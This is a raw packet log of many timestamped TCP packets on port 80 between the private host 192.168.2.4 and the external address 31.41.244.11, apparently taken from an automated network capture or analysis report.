Nov 5, 2024 18:46:10.924865961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924870968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924881935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924885035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924897909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924911976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924973011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924973011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.924981117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.924990892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.925002098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.925013065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.925020933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.925025940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.925052881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.925076962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.925107956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.925117970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.925128937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.925148010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.925179005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.925354958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.925370932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.925395966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.925411940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.952668905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952681065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952687979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952730894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952735901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952742100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952749014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952857018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952868938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952877045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.952881098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952893019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.952913046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.952944040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953001976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953015089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953035116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953046083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953054905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953058004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953069925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953069925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953080893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953094006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953099012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953107119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953129053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953146935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953159094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953342915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953353882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953365088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953376055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953387022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953393936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953399897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953416109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953423023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953434944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953443050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953445911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953458071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953461885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953464985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953474045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953476906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953490019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953499079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953500986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953514099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953526020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953530073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953537941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953550100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953557014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953557014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953563929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953596115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953802109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953804970 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953814030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953825951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953839064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953850031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953850985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953860998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953882933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953888893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953901052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953906059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953912020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953922987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953922987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953924894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953936100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953948021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953958035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.953959942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953979015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.953982115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954019070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954031944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954166889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954176903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954186916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954221964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954241037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954323053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954334974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954345942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954358101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954369068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954370022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954381943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954394102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954406023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954411983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954411983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954416990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954427958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954437971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954440117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954452038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954469919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954469919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954472065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954483986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954490900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954495907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954510927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954516888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954528093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954535007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954539061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954544067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954550028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954562902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954571962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954572916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954585075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954596043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954607010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954611063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954612970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954626083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954626083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954638958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954652071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954653025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954653025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954663038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954674959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.954682112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954682112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.954716921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955327988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955341101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955351114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955363035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955374956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955385923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955393076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955393076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955396891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955409050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955420017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955424070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955431938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955441952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955446959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955454111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955461979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955466032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955472946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955486059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955498934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955499887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955506086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955523968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955528021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955534935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955544949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955552101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955557108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955568075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955579042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955584049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955584049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955590963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955602884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955614090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955621958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955632925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955634117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955645084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955657005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955657959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955668926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955676079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955686092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955698967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.955701113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955715895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955715895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.955749035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956285954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956298113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956309080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956320047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956331968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956342936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956351995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956353903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956362009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956366062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956377029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956387997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956398964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956409931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956420898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956430912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956433058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956451893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956453085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956453085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956460953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956465006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956473112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956475973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956489086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956499100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956511021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956517935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956522942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956522942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956536055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956547022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956557989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956567049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956567049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956571102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956583023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956584930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956588030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956604004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956615925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956620932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956628084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956634998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956639051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956651926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.956674099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.956688881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957051992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957065105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957076073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957088947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957099915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957101107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957113981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957144022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957266092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957278013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957288980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957302094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957315922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957321882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957326889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957334042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957346916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957351923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957357883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957370996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957377911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957389116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957396030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957401037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957412958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957412958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957423925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957434893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957437992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957446098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957457066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957462072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957469940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957477093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957482100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957490921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957494020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957505941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957514048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957515955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957526922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957540035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957550049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957551956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957562923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957564116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957576036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957587004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.957587957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957612991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.957631111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958157063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958169937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958178997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958193064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958199978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958203077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958215952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958225965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958235025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958237886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958246946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958250046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958261967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958266973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958272934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958288908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958297014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958301067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958312988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958313942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958324909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958334923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958338976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958347082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958359003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958362103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958389997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958389997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958705902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958718061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958728075 CET	80	49804	31.41.244.11	192.168.2.4
